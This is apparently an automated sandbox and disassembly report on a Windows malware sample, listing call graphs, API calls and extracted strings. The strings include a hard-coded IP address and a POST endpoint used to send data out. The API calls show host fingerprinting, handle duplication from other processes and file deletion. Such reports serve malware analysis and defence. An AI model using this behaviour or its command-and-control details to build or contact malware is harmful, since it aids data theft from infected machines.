2756->2755 2758 2332ea 2757->2758 2759 232b10 3 API calls 2758->2759 2759->2760 2760->2752 2760->2753 2761->2754 2800 231ea0 RtlAllocateHeap 2762->2800 2764 23148e 2765 23149b NtQuerySystemInformation 2764->2765 2801 232060 2764->2801 2765->2764 2772 2314d3 2765->2772 2767 2315fa 2768 231ee0 RtlFreeHeap 2767->2768 2771 231603 2768->2771 2769 231512 OpenProcess 2769->2772 2770 2315f5 2770->2520 2771->2520 2772->2767 2772->2769 2772->2770 2773 23153a GetCurrentProcess DuplicateHandle 2772->2773 2774 2315eb FindCloseChangeNotification 2773->2774 2775 23156f 2773->2775 2774->2770 2775->2774 2776 23157b GetFileType 2775->2776 2776->2774 2777 23158a 2776->2777 2777->2774 2778 23159a CloseHandle GetCurrentProcess DuplicateHandle 2777->2778 2778->2774 2779 2315d2 2778->2779 2779->2774 2780 2315d8 CloseHandle 2779->2780 2780->2774 2781->2522 2783 2331c5 2782->2783 2808 238d00 GetUserDefaultUILanguage 2783->2808 2785 233233 2809 238c00 EnumDisplayDevicesA 2785->2809 2787 23324b 2788 238b90 GetCurrentHwProfileA 2787->2788 2789 233259 2788->2789 2811 238cc0 GetPhysicallyInstalledSystemMemory 2789->2811 2791 233265 2813 238ca0 GetSystemInfo 2791->2813 2793 233271 2814 238c50 GetKeyboardLayoutList 2793->2814 2795 23327d 2815 238c70 KiUserCallbackDispatcher GetSystemMetrics 2795->2815 2797 233289 2816 238d20 GetModuleFileNameW 2797->2816 2799 233295 2799->2526 2800->2764 2802 23206d 2801->2802 2806 232069 2801->2806 2803 232073 2802->2803 2804 232081 RtlReAllocateHeap 2802->2804 2807 231ea0 RtlAllocateHeap 2803->2807 2804->2806 2806->2764 2807->2806 2808->2785 2810 238c2a 2809->2810 2810->2787 2812 238cd4 __aulldiv 2811->2812 2812->2791 2813->2793 2814->2795 2815->2797 2816->2799 2817->2532 2819 2329ec 2818->2819 2820 232a17 TerminateThread 2819->2820 2821 232a25 2819->2821 2820->2821 2822 232a2e TerminateThread 2821->2822 2823 232a3d 2821->2823 2822->2823 2823->2538 2825 2343e0 3 API calls 2824->2825 2826 231c94 2825->2826 2827 231e80 HeapDestroy 2826->2827 2827->2542 2828 232bd0 2829 232c09 2828->2829 2835 232bf8 2828->2835 2830 232cd5 2829->2830 2837 232c16 2829->2837 2831 232d29 2830->2831 2832 232d08 2830->2832 2830->2835 2833 232060 2 API calls 2831->2833 2834 231ee0 RtlFreeHeap 2832->2834 2833->2835 2834->2835 2836 232c88 2836->2835 2838 232c94 ExitProcess 2836->2838 2837->2835 2837->2836 2839 232c9e 2837->2839 2839->2835 2840 232cbc ExitProcess 2839->2840 2867 231380 2868 23139d 2867->2868 2873 2313e0 2867->2873 2869 2313d5 2868->2869 2870 23140a 2868->2870 2876 231ea0 RtlAllocateHeap 2869->2876 2877 231ec0 RtlSizeHeap 2870->2877 2874 231415 2874->2873 2875 232060 2 API calls 2874->2875 2875->2873 2876->2873 2877->2874 2878 231110 2879 2312e2 2878->2879 2880 23112d 2878->2880 2881 231189 2880->2881 2885 2311b0 2880->2885 2891 2336d0 2881->2891 2883 2311a8 2884 231ee0 RtlFreeHeap 2883->2884 2884->2879 2885->2883 2889 23120e 2885->2889 2906 2390b0 2885->2906 2887 2336d0 7 API calls 2888 2312a2 2887->2888 2888->2883 2890 2312c8 DeleteFileW 2888->2890 2889->2883 2889->2887 2890->2883 2892 2336ee 2891->2892 2893 238b90 GetCurrentHwProfileA 2892->2893 2894 233702 2893->2894 2910 2338c0 2894->2910 2897 2337b4 2928 2334a0 2897->2928 2898 2337fa 2899 2337ef 2898->2899 2943 231ea0 RtlAllocateHeap 2898->2943 2902 231ee0 RtlFreeHeap 2899->2902 2903 23379b 2902->2903 2903->2883 2904 233820 2904->2899 2905 232b10 3 API calls 2904->2905 2905->2899 2907 2390c8 2906->2907 2909 2390e0 2907->2909 2958 232200 2907->2958 2909->2889 2911 2338f8 2910->2911 2927 233791 2910->2927 2911->2927 2944 238f20 2911->2944 2914 233953 2953 231ea0 RtlAllocateHeap 2914->2953 2915 233940 2917 231ee0 RtlFreeHeap 2915->2917 2917->2927 2918 233965 2919 237d10 RtlAllocateHeap 2918->2919 2922 233972 2919->2922 2920 2339a0 2921 2339de 2920->2921 2923 2339ae 2920->2923 2924 231ee0 RtlFreeHeap 2921->2924 2922->2920 2925 2380d0 RtlFreeHeap 2922->2925 2926 231ee0 RtlFreeHeap 2923->2926 2924->2927 2925->2920 2926->2927 2927->2897 2927->2898 2927->2903 2929 2334ba 2928->2929 2930 233548 2928->2930 2955 231ea0 RtlAllocateHeap 2929->2955 2956 231ec0 RtlSizeHeap 2930->2956 2933 2334cc 2933->2899 2934 2335a1 2937 2335bf 2934->2937 2938 232b10 3 API calls 2934->2938 2935 233573 2935->2934 2936 233614 2935->2936 2957 231ec0 RtlSizeHeap 2936->2957 2939 2334a0 5 API calls 2937->2939 2938->2937 2939->2933 2941 233622 2941->2933 2942 232060 2 API calls 2941->2942 2942->2933 2943->2904 2945 232360 2 API calls 2944->2945 2947 238f4c 2945->2947 2946 233934 2946->2914 2946->2915 2947->2946 2948 239098 CloseHandle 2947->2948 2954 231ea0 RtlAllocateHeap 2947->2954 2948->2946 2950 23902d 2950->2948 2951 239082 2950->2951 2952 231ee0 RtlFreeHeap 2950->2952 2951->2948 2952->2951 2953->2918 2954->2950 2955->2933 2956->2935 2957->2941 2959 23220f 2958->2959 2962 231ea0 RtlAllocateHeap 2959->2962 2961 232223 2961->2909 2962->2961 2963 231897 2965 231845 2963->2965 2964 2318e8 2966 2318a2 GlobalHandle 2965->2966 2968 23188c 2965->2968 2966->2965 2967 2319f7 LoadLibraryA GetProcAddress 2967->2964 2968->2964 2968->2967 2969 23177a 2971 23174c 2969->2971 2970 2317e0 3 API calls 2970->2971 2971->2970 2972 2317b5 2971->2972

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00231EA0: RtlAllocateHeap.NTDLL(031B0000,00000008,00233D82), ref: 00231EB0
                                                  • NtQuerySystemInformation.NTDLL(00000010,?,00001000,00000000), ref: 002314A9
                                                  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 00231523
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0023154B
                                                  • DuplicateHandle.KERNELBASE(000000FF,?,00000000), ref: 00231565
                                                  • GetFileType.KERNELBASE(000000FF), ref: 0023157F
                                                  • CloseHandle.KERNEL32(000000FF), ref: 0023159E
                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,00000000,00000001), ref: 002315AE
                                                  • DuplicateHandle.KERNEL32(000000FF,?,00000000), ref: 002315C8
                                                  • CloseHandle.KERNEL32(000000FF), ref: 002315DC
                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 002315EF
                                                    • Part of subcall function 00231EE0: RtlFreeHeap.NTDLL(031B0000,00000000,00000000,01430000), ref: 00231EFE
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Handle$CloseProcess$CurrentDuplicateHeap$AllocateChangeFileFindFreeInformationNotificationOpenQuerySystemType
                                                  • String ID:
                                                  • API String ID: 2769610337-0
                                                  • Opcode ID: 64d74ca101909f20c73012933e87197aaffcca6bedb27d4fecd7adac127e3a0f
                                                  • Instruction ID: 58c275442e21346fd428e2081c5fd6107c0b4ee4a949310568ebeb0b31b36d24
                                                  • Opcode Fuzzy Hash: 64d74ca101909f20c73012933e87197aaffcca6bedb27d4fecd7adac127e3a0f
                                                  • Instruction Fuzzy Hash: 985152F4D10209EFDB14CFD8D989BAEB7B5FB48705F108258E612A7280D7749A61CF61

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 75 2317e0-231843 76 231845-23184b 75->76 77 23184e-231857 75->77 76->77 78 2318e2-2318e6 77->78 79 23185d-23188a call 232130 call 2390f0 77->79 80 2318e8-2318ea 78->80 81 2318ef-231916 78->81 91 231899-2318a0 79->91 92 23188c-231895 79->92 83 231a19-231a1c 80->83 84 231a16 81->84 85 23191c-231925 81->85 84->83 85->84 88 23192b-231931 85->88 90 231938-231944 88->90 93 231960-2319c9 90->93 94 231946-23195e 90->94 95 2318a2-2318c8 GlobalHandle 91->95 96 2318cb-2318dd 91->96 92->78 97 2319f7-231a12 LoadLibraryA GetProcAddress 93->97 98 2319cb-2319dc 93->98 94->90 95->96 96->76 97->83 99 2319f1-2319f4 98->99 100 2319de-2319ef 98->100 99->97 100->98
                                                  APIs
                                                  • GlobalHandle.KERNEL32(00000000), ref: 002318C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: GlobalHandle
                                                  • String ID: l
                                                  • API String ID: 1075865800-2517025534
                                                  • Opcode ID: b6c2c820086e090a6e65cbef9173a8a310996b1ba61824610d16e5691f4cb336
                                                  • Instruction ID: 59ebe0fc6cc7e086a88859cf44bc6f04bda2106d8a6429e5fea2d0cd20df25a2
                                                  • Opcode Fuzzy Hash: b6c2c820086e090a6e65cbef9173a8a310996b1ba61824610d16e5691f4cb336
                                                  • Instruction Fuzzy Hash: 9E91C5B4E15209DFCF08CF98D590AADBBB2FF48308F248199D915AB345D730AA61DF94

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 172 238ca0-238cbf GetSystemInfo
                                                  APIs
                                                  • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,00233271,G1#), ref: 00238CAA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem
                                                  • String ID: q2#
                                                  • API String ID: 31276548-3848666742
                                                  • Opcode ID: c119e4caff3985fc27665ebf9d77a2166ff78020601de8af9d0b8d0780eff462
                                                  • Instruction ID: 5173f3ce8cfea19f0f04eed0bea2921325d05dd800785ee200cd59b6c47fdbe6
                                                  • Opcode Fuzzy Hash: c119e4caff3985fc27665ebf9d77a2166ff78020601de8af9d0b8d0780eff462
                                                  • Instruction Fuzzy Hash: 34D0A97490420C8BCB04DF90D84889AB7FDAB48200F0081B4DC8847300EA32E9128BD1
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 5f1edb4a8a433ba8af8245a742742a02f8e3ea1f166909dc890058782719e31e
                                                  • Instruction ID: fc4c8b264cb6b19f2aa427bad1b95a639ce99786f4186407e3dcba6de960d28a
                                                  • Opcode Fuzzy Hash: 5f1edb4a8a433ba8af8245a742742a02f8e3ea1f166909dc890058782719e31e
                                                  • Instruction Fuzzy Hash: 164102B0B04205DBDB04CFA4D851B69B7B6DB84300F2081A8E6454F7D9D776DF62DB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 29 232810-232855 31 232857 29->31 32 23285c-2328c1 29->32 33 23291a 31->33 39 2328c3 32->39 40 2328c5-2328e7 CreateThread 32->40 34 23291c-23291f 33->34 39->33 41 2328eb-23290f CreateThread 40->41 42 2328e9 40->42 43 232913-232918 41->43 44 232911 41->44 42->33 43->34 44->33
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0u$0u0u$0u0u$45.125.66.18$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.4$`
                                                  • API String ID: 0-2265949662
                                                  • Opcode ID: 917edf8db4694d881001c7256f2cc7d309b7694be9234db1dbacebc08bbda815
                                                  • Instruction ID: c4b7f8b519bdd91a94a33ac4c844771340ba03a9a1e8d8dbc671e0299467c61b
                                                  • Opcode Fuzzy Hash: 917edf8db4694d881001c7256f2cc7d309b7694be9234db1dbacebc08bbda815
                                                  • Instruction Fuzzy Hash: 713106B4650308EFE710CF50DC8AFA97B65AB08701F20C144FA499F2D0C3B5AA8ACB95

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateMutexA.KERNELBASE(00000000,00000000,082e2202-17f7-4654-a651-ac9a3778e1d7), ref: 00231D43
                                                  • GetLastError.KERNEL32 ref: 00231D52
                                                  • Sleep.KERNELBASE(00001388), ref: 00231E1C
                                                  • CloseHandle.KERNEL32(00000000), ref: 00231E3A
                                                  • ExitProcess.KERNEL32 ref: 00231E42
                                                  Strings
                                                  • 082e2202-17f7-4654-a651-ac9a3778e1d7, xrefs: 00231D3A
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateErrorExitHandleLastMutexProcessSleep
                                                  • String ID: 082e2202-17f7-4654-a651-ac9a3778e1d7
                                                  • API String ID: 168847217-1460249064
                                                  • Opcode ID: 523dacda9255a23dddba1526a4b9bf07b4661f89823b777232fb0227ac5d1625
                                                  • Instruction ID: e8ab7629b6b285ea8f589291f3a0b5d5c3383a0c9581102bca0a0609e3200139
                                                  • Opcode Fuzzy Hash: 523dacda9255a23dddba1526a4b9bf07b4661f89823b777232fb0227ac5d1625
                                                  • Instruction Fuzzy Hash: B931E2F0D202199BDB28EFA4E84ABEE7775AB14300F100076E805B2181DB759A75DFA2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 101 232e60-232e66 102 232e6d-232e74 101->102 103 232e7a-232e80 102->103 104 2330af-2330b2 102->104 105 232e8e-232e97 103->105 106 23309f-2330aa Sleep 105->106 107 232e9d-232ea9 105->107 106->102 108 23309a 107->108 109 232eaf-232ebe 107->109 108->106 110 232ec0-232ecf 109->110 111 232ed5-232ef8 call 2391d0 109->111 110->108 110->111 114 232f10-232f2c 111->114 115 232efa-232f0b call 232920 111->115 117 232fc3-232ff0 call 231ea0 114->117 118 232f32-232f6e 114->118 120 232e82-232e8a 115->120 127 232ff2-232ffd 117->127 128 233009-233061 117->128 123 232f70-232f82 118->123 124 232f87-232faa 118->124 120->105 123->120 124->117 130 232fac-232fb7 124->130 127->128 131 233068-23306f 128->131 130->117 132 233071-23307c 131->132 133 233088-233093 131->133 132->133 133->108
                                                  APIs
                                                  • Sleep.KERNELBASE(000003E8), ref: 002330A4
                                                    • Part of subcall function 00231EA0: RtlAllocateHeap.NTDLL(031B0000,00000008,00233D82), ref: 00231EB0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeapSleep
                                                  • String ID: /api/receiver/recv$Content-Type: application/octet-stream$POST
                                                  • API String ID: 4201116106-1595302217
                                                  • Opcode ID: e5dc4291eda71ea1872e02d03fc7b1593f456cad97b9189cb332bdeaf25693a7
                                                  • Instruction ID: d1fcc37bf905aa18eb62fe0ab4f22badb6833119242ab394a125ce99aa86200b
                                                  • Opcode Fuzzy Hash: e5dc4291eda71ea1872e02d03fc7b1593f456cad97b9189cb332bdeaf25693a7
                                                  • Instruction Fuzzy Hash: E97145B8A10219EBCB14CF84D584AB9BBB1FF48714F208198F9865B381D775EE91DB90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 134 238cc0-238cd2 GetPhysicallyInstalledSystemMemory 135 238cf2-238cf5 134->135 136 238cd4-238ceb call 239260 134->136 136->135
                                                  APIs
                                                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(e2#,00233265,G1#,?,?,?,?,?,?,?,?,?,00233147), ref: 00238CCA
                                                  • __aulldiv.LIBCMT ref: 00238CE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: InstalledMemoryPhysicallySystem__aulldiv
                                                  • String ID: e2#
                                                  • API String ID: 3833932492-4266325466
                                                  • Opcode ID: 2af1d3b17a37b5c456f073e1125a321b114c821cf87cf284286e2c582e2440c9
                                                  • Instruction ID: 08e2b5bda3e6667a0c31b8d53a608763204717f86446c8abe5e5db8898070684
                                                  • Opcode Fuzzy Hash: 2af1d3b17a37b5c456f073e1125a321b114c821cf87cf284286e2c582e2440c9
                                                  • Instruction Fuzzy Hash: CEE08C78600308B7CB04DFE0DC45B9A777CAB48700F0081A9B908AB280EF71AA11C7E5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 164 233ef0-233f10 VirtualAlloc 165 233f12-233f14 164->165 166 233f16-233f33 VirtualAlloc 164->166 167 233f61-233f62 165->167 168 233f35-233f37 166->168 169 233f39-233f56 VirtualAlloc 166->169 168->167 170 233f58-233f5a 169->170 171 233f5c 169->171 170->167 171->167
                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,00233D5B,?,00231D86,?), ref: 00233EFE
                                                  • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,00233D5B,?,00231D86,?), ref: 00233F21
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 0bda64f109acfb01d00f4db6a623269a6a1177a51255df4cc77c2c7dcad28a20
                                                  • Instruction ID: d7d83f3499a1cb2aa59dfc10b914a2c9be633b63b130e941872df18ce0969749
                                                  • Opcode Fuzzy Hash: 0bda64f109acfb01d00f4db6a623269a6a1177a51255df4cc77c2c7dcad28a20
                                                  • Instruction Fuzzy Hash: B1F03AB0BA9304EEFB269F21BC9EB1136A49348B16F500420B34EAD5D0F3F4D3509A15

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 173 232bd0-232bf6 174 232c09-232c10 173->174 175 232bf8-232bfd 173->175 176 232c16-232c6b call 2391d0 174->176 177 232cd5-232cdc 174->177 178 232c04 175->178 199 232cc4-232cd0 176->199 200 232c6d-232c74 176->200 180 232ce2-232d06 177->180 181 232d76-232d7d 177->181 182 232da6-232da9 178->182 186 232d29-232d4c call 232060 180->186 187 232d08-232d0f 180->187 183 232d93-232d9a 181->183 184 232d7f-232d83 181->184 183->182 190 232d9c-232d9f 183->190 188 232d91 184->188 189 232d85-232d8a 184->189 197 232d74 186->197 198 232d4e-232d6d 186->198 191 232d11-232d14 187->191 192 232d1b-232d27 call 231ee0 187->192 188->182 189->188 190->182 191->192 192->197 197->182 198->197 199->182 202 232c76-232c7d 200->202 203 232c88-232c92 200->203 202->203 205 232c7f-232c86 202->205 206 232c94-232c96 ExitProcess 203->206 207 232c9c 203->207 205->203 208 232c9e-232ca5 205->208 207->199 209 232cb0-232cba 208->209 210 232ca7-232cae 208->210 209->199 211 232cbc-232cbe ExitProcess 209->211 210->199 210->209
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: ef4b1eb07e4d6d7c6746f7b40be23d2fe5256c1f939be5a6fb88261701f37721
                                                  • Instruction ID: be23e6f4a3b02bb26004b8fbc07497f0df1098a3bc1c98debaa51036225f9b4e
                                                  • Opcode Fuzzy Hash: ef4b1eb07e4d6d7c6746f7b40be23d2fe5256c1f939be5a6fb88261701f37721
                                                  • Instruction Fuzzy Hash: 945129B4910209EFDB18CF94C598FADB7B1BF44304F208599E9056B291C375EE99DF90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 212 238c70-238c96 KiUserCallbackDispatcher GetSystemMetrics
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00238C75
                                                  • GetSystemMetrics.USER32(00000001), ref: 00238C86
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherMetricsSystemUser
                                                  • String ID:
                                                  • API String ID: 365337688-0
                                                  • Opcode ID: a448e2f7bbd3ce2892fbc6d8d3ed6b5cf8c169cf464a3970c693712b8469533e
                                                  • Instruction ID: 6ffc7dd7e15365fb9c74c04652b1c95be68df18adfa22e69a0755c4ce78e42a6
                                                  • Opcode Fuzzy Hash: a448e2f7bbd3ce2892fbc6d8d3ed6b5cf8c169cf464a3970c693712b8469533e
                                                  • Instruction Fuzzy Hash: 02D0C934148308EFD704DF90E80DB94BBA8FB48751F10C176ED8D4A381DAB255458BE2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 213 238b90-238ba8 GetCurrentHwProfileA 214 238bfa-238bfd 213->214 215 238baa-238bb1 213->215 216 238bd3-238bdd 215->216 217 238bb3-238bd1 call 231f10 215->217 216->214 218 238bdf-238bf7 call 231f10 216->218 217->214 218->214
                                                  APIs
                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 00238BA0
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CurrentProfile
                                                  • String ID:
                                                  • API String ID: 2104809126-0
                                                  • Opcode ID: a6c110dabd4d0e2e1e8966136b6080e973dceee5c2f19a948de7c2c0b7ce21b1
                                                  • Instruction ID: c208f5679f58f6ccf7c3eb0272f66d8e6195b26247c526df495f11f572a190c2
                                                  • Opcode Fuzzy Hash: a6c110dabd4d0e2e1e8966136b6080e973dceee5c2f19a948de7c2c0b7ce21b1
                                                  • Instruction Fuzzy Hash: E6F0D1F491030AA7CB04CF54D891BBE7B7AEB40308F20C169F9059A245EB309A208B50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 223 232060-232067 224 232069-23206b 223->224 225 23206d-232071 223->225 226 232097-232098 224->226 227 232073-23207f call 231ea0 225->227 228 232081-232091 RtlReAllocateHeap 225->228 227->226 228->226
                                                  Memory Dump Source
